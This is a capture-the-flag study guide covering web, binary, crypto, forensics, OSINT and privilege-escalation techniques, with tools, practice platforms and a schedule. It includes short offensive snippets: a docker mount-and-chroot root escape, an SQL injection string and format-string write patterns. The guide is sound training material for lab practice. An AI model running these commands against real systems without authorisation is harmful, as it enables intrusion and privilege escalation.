CTF Practice Guide

CTF Strategy by Category

Web Exploitation

Key techniques:

• SQL injection (union, boolean blind, time-based)
• XSS (reflected, stored, DOM-based)
• SSRF (internal port scan, metadata access)
• LFI/RFI (log poisoning, PHP wrappers)
• IDOR (object reference manipulation)
• Business logic flaws

Tools: Burp Suite, SQLMap, ffuf, Gobuster, Nikto

Practice platforms:

• DVWA — self-hosted, various difficulty levels
• Juice Shop — self-hosted, modern web vulns
• WebGoat — guided learning
• PortSwigger Academy — free, excellent tutorials

PWN / Binary Exploitation

Key techniques:

• Buffer overflow (stack, heap)
• ROP (Return-Oriented Programming)
• Format string vulnerabilities
• Integer overflow
• Use-after-free

Tools: GDB (pwndbg/GEF), pwntools, ROPGadget, ropper, one_gadget

Practice:

# pwntools template
from pwn import *

context.update(arch='i386', os='linux')
# Your exploit code

Practice platforms:

• VulnHub pwn challenges — search for "pwn" or "exploit"
• Rop Emporium — excellent ROP tutorial series
• Binjabo — challenges by pwnable.kr
• Pwnable.kr — classic pwn challenges

Cryptography

Key techniques:

• Base64/32/16 encoding
• XOR cipher (with known/unknown key)
• RSA attacks (small e, padding oracle, weak keys)
• AES ECB pattern recognition
• Hash length extension

Tools: CyberChef, hashcat, John the Ripper, openssl, rsatool

Practice:

# CyberChef recipes to know:
# - From Base64
# - XOR with key
# - Decrypt AES ECB
# - Hash identification

Forensics

Key techniques:

• File carving (binwalk, foremost)
• Memory dump analysis (Volatility)
• PCAP analysis (Wireshark, tcpdump)
• Steganography (zsteg, steghide)
• Log analysis

Tools: Volatility, binwalk, foremost, strings, hexedit, Wireshark

Practice:

# File type detection
file challenge
binwalk challenge
xxd challenge | head

# Carve files
binwalk -e challenge
foremost -i challenge -o output

# Memory analysis (Volatility 3)
python3 vol.py -f memory.dmp windows.info
python3 vol.py -f memory.dmp windows.pslist
python3 vol.py -f memory.dmp windows.malfind

OSINT

Key techniques:

• Google dorking
• WHOIS lookup
• DNS enumeration
• Metadata extraction
• Social media investigation
• Breach database search

Tools: theHarvester, Maltego, SpiderFoot, exiftool

Practice:

# Google dorking examples
site:example.com filetype:pdf
site:example.com "internal"
inurl:admin login

# WHOIS
whois domain.com

# Metadata
exiftool document.pdf

Privilege Escalation

Linux:

• SUID/SGID exploitation (GTFOBins)
• Sudo misconfigurations
• Kernel exploits
• Cron job abuse
• NFS misconfigurations
• Docker group membership

Windows:

• Token impersonation (SeImpersonatePrivilege)
• Service misconfigurations
• AlwaysInstallElevated
• Registry autorun
• DLL hijacking
• Kernel exploits

Tools: linpeas, winpeas, pspy, accesschk, PowerUp

Practice:

# Linux privesc checklist
find / -perm -4000 2>/dev/null
sudo -l
cat /etc/crontab
groups
docker run -v /:/mnt alpine chroot /mnt sh

# Windows privesc checklist
whoami /priv
whoami /all
net user
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Platform-Specific Strategies

HackTheBox

Starting out:

1. Start with "Starting Point" machines (free)
2. Connect via OpenVPN
3. Follow along with friendly walkthroughs initially

Getting better:

1. Attempt machine for 1-2 hours
2. If stuck, read hints (not full walkthrough)
3. Try again
4. If really stuck, read writeup but don't just copy — understand

Advanced:

1. Time yourself (2 hours to root)
2. Root without metasploit (optional challenge)
3. Do Hard/Insane boxes

TryHackMe

Learning path:

1. Complete Beginner → Jr. Penetration Tester → Offensive Pentesting
2. Do rooms in order (they build on each other)
3. Use PwnedHelper if truly stuck (after trying)

Certification prep rooms:

• OSCP path
• eJPT path
• CEH path

Proving Grounds

Why PG over HTB for OSCP:

• More similar difficulty to actual exam
• Some machines are exact recreations
• Less "trick" machines
• Focus on fundamentals

Strategy:

1. Do easy machines first
2. Medium Linux, then medium Windows
3. Attempt Hard when ready
4. Practice buffer overflow (pg-pwn series)

Common CTF Patterns

When stuck on Web

# 1. Check for hidden parameters
ffuf -w wordlist.txt -u http://target/?FUZZ=value

# 2. Check source code
view-source: or Ctrl+U

# 3. Check cookies
document.cookie in browser console

# 4. Try common injection points
' " ; -- admin' OR '1'='1

# 5. Check for backup files
index.php.bak, config.php~, .git/backup

When stuck on PrivEsc

# Linux:
# 1. Run linpeas.sh
# 2. Check SUID (GTFOBins)
# 3. Check sudo -l
# 4. Check cron
# 5. Check /etc/exports (NFS)

# Windows:
# 1. Run winpeas.bat
# 2. Check SeImpersonatePrivilege (printspoofer)
# 3. Check services (accesschk)
# 4. Check AlwaysInstallElevated
# 5. Check registry autoruns

When stuck on PWN

# 1. Understand the binary
checksec binary
rabin2 -i binary
rabin2 -R binary (relocations)

# 2. Find offset
cyclic 100
cyclic -l aaaa (crash address)

# 3. Find gadgets
ROPgadget --binary binary
ropper --file binary

# 4. If format string
%08x %n  (write arbitrary)
%<num>$s  (leak stack)

Flag Patterns

# Common flag formats:
flag{...}
CTF{...}
p_ctf{...}
THC{...}
pragyan{...}

# Search for flags in files
strings file | grep -i flag
grep -r "flag{" .
find . -name "*.txt" -exec grep -l "flag" {} \;

# In PCAP files
tshark -r capture.pcap -Y "http" -T fields -e http.file_data | grep flag

Recommended Practice Schedule

Daily:   1 HTB machine OR 1 THM room (1-2 hours)
Weekly:  1 CTF (3-5 hours)
Monthly: 1 certification exam attempt OR PG session

Weekly focus:
- Mon: Recon/web
- Tue: PrivEsc
- Wed: Crypto/forensics
- Thu: Network/web
- Fri: Pwn (if preparing for OSCP)

Key Takeaways

1. Struggle before looking at solutions — you learn more from failing and trying again
2. Take notes — document what you tried, what worked, why
3. Read writeups — even after solving, read how others approached it
4. Focus on fundamentals — basic skills beat fancy techniques
5. Practice consistently — 1 hour daily beats 7 hours on weekends